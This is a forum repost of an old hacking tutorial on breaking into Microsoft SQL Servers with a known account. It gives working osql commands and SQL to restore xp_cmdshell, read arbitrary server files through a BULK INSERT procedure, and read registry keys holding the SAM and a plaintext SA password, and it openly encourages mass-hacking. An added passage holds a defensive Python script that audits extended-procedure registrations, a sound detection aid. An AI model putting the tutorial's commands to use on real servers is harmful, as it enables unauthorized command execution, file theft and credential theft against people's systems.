[Hacking] How 2 Fixx SQL Errors

06.01.2008, 17:00

Found this on the net a while ago. It's in English, but surely helpful for one or the other of you :)


0) Index
1) Tools Needed
2) The Easiest Way
3) Restoring xp_cmdshell
4) Reading almost any file on server
5) Reading The Registry
6) Final Words

0) Index

This tutorial is intended as a guide to hack the secured sql servers. Concentrating on the well
known SQL_ERROR response.
This means:

- Hack sql servers that have only got a normal user pass
- Hack sql servers where the stored procedure xp_cmdshell has been disabled

This DOESN'T mean:

- Hack sql servers where the .dll has been changed or switched with another one.
- Explaining how to bruteforce sql server accounts

Hope this tutorial is of any use to those who want to hack more things or just want to know things.
Plz ***** about this tut if things don't work but don't start bitching that it is too slow
to hack more than 10 machines a day.

I also want to thank Swiv for his time to answer my questions and for his portion of contribution to this.

1) Tools Needed

- A server with port 1433 open and the correct username/password
- osql.exe
- sqlexec.exe written by sunx (the one that has the green apple as icon)

ALSO keep in mind that all of the given commands only work if they are enabled, else it will fail.

2) The Easiest Way

First of all make sure you use the correct sqlexec version and not "sqlexec for nethacker 1.0".
So use sqlexec.exe that has a green apple as icon.
When opening it has a very simple interface and only 1 thing that "sqlexec for nethacker 1.0" hasn't got,
that is the format field. In that combobox (that is empty when opening the app) you can select 4 ways
of sending the data to the sql server.

The options:

1 xp_cmdshell"%s"
2 select * from openrowset etc
3 create procedure #proc_temp etc
4 %s

Option 1 is the same as in "sqlexec for nethacker 1.0". So when "sqlexec for nethacker 1.0" gives a
SQL_ERROR this app will do also, BUT when selecting option 2 most of the time you will be able to hack
the server in the normal way.

3) Restoring xp_cmdshell

Restoring xp_cmdshell seems like a difficult task but in fact it is easy.
First of all this only works when the stored procedure xp_cmdshell is dropped; if the .dll has been changed
then it won't work.
This is only intended for when the easy way doesn't work, but most of the time it does.

Put the following in a .txt (example: restore.txt) and save it in the same directory as osql.exe is:

use master
exec sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll'
go

The above path depends on the installation of MSSQL so it can be different under some circumstances.
When done execute osql.exe like this:

osql.exe -S 123.123.123.123 -U sa -P "" -i restore.txt

Now if everything went how it is supposed to go, xp_cmdshell is enabled again and you can use option
1 from sqlexec or the other app to hack the machine.

If you want to view all stored procedures on the server currently in your power execute osql like:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_stored_procedures"

Keep in mind that this also has got procedures made by an admin and maybe hasn't got the standard ones.
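A defender-side counterpart to this section, added here and not part of the original post or the tutorial it quotes: the tutorial re-registers xp_cmdshell with sp_addextendedproc and notes that the DLL path varies per install and may have been switched for another DLL. This Python audit takes (procedure name, dll_name) rows, as exported from the master.sys.extended_procedures catalog view on SQL Server 2005 and later (the export shape is an assumption), and flags a DLL registered from outside the instance's Binn directory, a DLL file name Microsoft does not ship, and a well-known procedure bound to a different DLL than expected. The sample rows and Binn path are constructed for the example.

```python
"""Audit extended stored procedure registrations on a SQL Server instance.

Added example, not code from the original post. Rows are (procedure name,
dll_name) pairs, e.g. from:
    SELECT name, dll_name FROM master.sys.extended_procedures
The export format, sample rows and Binn path are assumptions.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

# DLLs that carry Microsoft's own extended procedures (allowlist, not exhaustive;
# extend it from a known-good instance of the same version).
SHIPPED_XP_DLLS = {"xplog70.dll", "xpstar.dll", "xpsqlbot.dll", "xprepl.dll"}

# Procedure -> DLL it is expected to be bound to. Only xp_cmdshell -> xplog70.dll
# is taken from this post; add the rest from a known-good instance.
EXPECTED_DLL = {"xp_cmdshell": "xplog70.dll"}


@dataclass(frozen=True)
class Finding:
    proc: str
    dll: str
    reason: str


def _normalise(path: str) -> str:
    # Windows paths are case-insensitive; compare lower-case with backslashes.
    return path.replace("/", "\\").lower()


def audit_extended_procs(rows, binn_dir, expected=EXPECTED_DLL):
    """Return a Finding for every registration that deserves a closer look."""
    binn = _normalise(binn_dir).rstrip("\\") + "\\"
    findings = []
    for proc, dll in rows:
        dll_n = _normalise(dll)
        base = ntpath.basename(dll_n)
        # A full path outside Binn means the DLL was dropped somewhere else.
        if "\\" in dll_n and not dll_n.startswith(binn):
            findings.append(Finding(proc, dll, "dll outside Binn directory"))
        # A file name that Microsoft does not ship.
        if base not in SHIPPED_XP_DLLS:
            findings.append(Finding(proc, dll, "dll not in shipped allowlist"))
        # A known procedure pointed at a different DLL than the one it ships in.
        want = expected.get(proc.lower())
        if want is not None and base != want:
            findings.append(Finding(proc, dll, "dll does not match the one expected for this procedure"))
    return findings


# Constructed sample: one instance's registrations as a defender might export them.
BINN_DIR = r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn"
SAMPLE_ROWS = [
    ("xp_cmdshell", r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll"),  # as re-registered in this post
    ("xp_regread", "xpstar.dll"),                                # shipped DLL, bare name
    ("xp_example_custom", r"C:\Windows\Temp\custom.dll"),       # constructed: unknown DLL outside Binn
    ("xp_getfiledetails", r"C:\Windows\Temp\xplog70.dll"),      # constructed: shipped name, wrong place
]

if __name__ == "__main__":
    for f in audit_extended_procs(SAMPLE_ROWS, BINN_DIR):
        print(f"{f.proc:20} {f.reason:55} {f.dll}")
```

Run against the sample it reports three findings: two for the custom DLL (outside Binn, not on the allowlist) and one for the shipped-looking file name sitting in C:\Windows\Temp. A registration such as xp_cmdshell bound to xpstar.dll trips only the expected-DLL check, which is the "dll has been switched" case the post says it does not cover.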

4) Reading almost any file on server

I say any because sometimes when the file is too big it refuses to read it. It also refuses to read when
the file is in use.
First of all check if the file is on the server before attempting to read it; for that execute osql like:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "xp_getfiledetails 'c:\winnt\system32\net.exe'"

If the file exists it will give back some numbers meaning filesize,date etc.

When the response was a positive report put the following in a .txt (example: read.txt) and make sure it
is in the same folder as osql.exe:

-- loads a text file into a temp table line by line and returns the rows
Create proc sp_readTextFile @filename sysname
as
begin
set nocount on
Create table #tempfile (line varchar(8000))
-- dynamic SQL because BULK INSERT only takes a literal file name, not a variable
exec ('bulk insert #tempfile from "' + @filename + '"')
select * from #tempfile
drop table #tempfile
End
go

When done execute osql.exe like this:

osql.exe -S 123.123.123.123 -U sa -P "" -i read.txt

You have now successfully created a stored procedure to read files. Now how do you read files with it?
Very simple, use osql.exe like this:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "sp_readTextFile 'C:\winnt\system32\drivers\etc\services'" -o c:\breadfile.txt

Then just browse to your local C: and there you will find the file. Only problem is there will be a lot
of white stripes and "-" characters; that is the normal sql output way, I can't do anything about that.

5) Reading The Registry

Reading the registry can be handy when there is valuable information stored in it like passwords.
I'll give a little example on how to read the sam file, just take 1 note: even if you read the sam file on
a win2k machine it is useless because of the standard security it has. Explanation on what you can do
with registry reading will be explained later.

Fire up osql.exe and execute it like this:

osql.exe -S 123.123.123.123 -U sa -P "" -Q "USE master EXEC xp_regread 'HKEY_LOCAL_MACHINE', 'SECURITY\SAM\Domains\Account', 'F'"

and in this key:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\MSSQLServer\SQLEW\Registered Server\SQL 6.5

the password of the SA user is stored in plain text. Could be handy if you hack a machine that has sql
running and the hack has got no super user rights, like the IISMEDIA exploit. Then just grab the sql pass
from the registry.

6) Final Words

Hope this has been of some help. I can give NO guarantee everything in here will work under different
circumstances. But all critics are welcome.
Further I have spent some time investigating all this and trying to explain it in as simple a way as possible,
so I say again don't ***** if this ain't good enough for mass-hacking.

For the rest keep learning and finding out things peeps.

Hacking is something you gotta feel.
Don't be lame, don't be lazy, try things yourself, it really pays back.
1 final note:
I did not give scenarios and solutions on purpose. I hope that with the info that is in this paper
you all will have enough imagination to hack something with it. Maybe later on I will make a scenarios
and solutions paper about this.




raid-rush.ws